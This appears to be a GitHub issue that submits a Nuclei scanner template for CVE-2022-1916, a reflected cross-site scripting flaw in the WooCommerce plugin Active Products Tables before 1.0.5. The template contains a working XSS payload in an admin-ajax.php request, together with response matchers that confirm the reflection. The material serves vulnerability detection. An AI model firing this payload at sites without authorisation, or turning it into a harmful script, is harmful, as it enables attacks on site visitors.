### ISSUE TITLE
Active Products Tables for WooCommerce < 1.0.5 - Reflected Cross-Site-Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4650]
```yaml
id: CVE-2022-1916

info:
  name: Active Products Tables for WooCommerce < 1.0.5 - Reflected Cross-Site-Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
  tags: xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
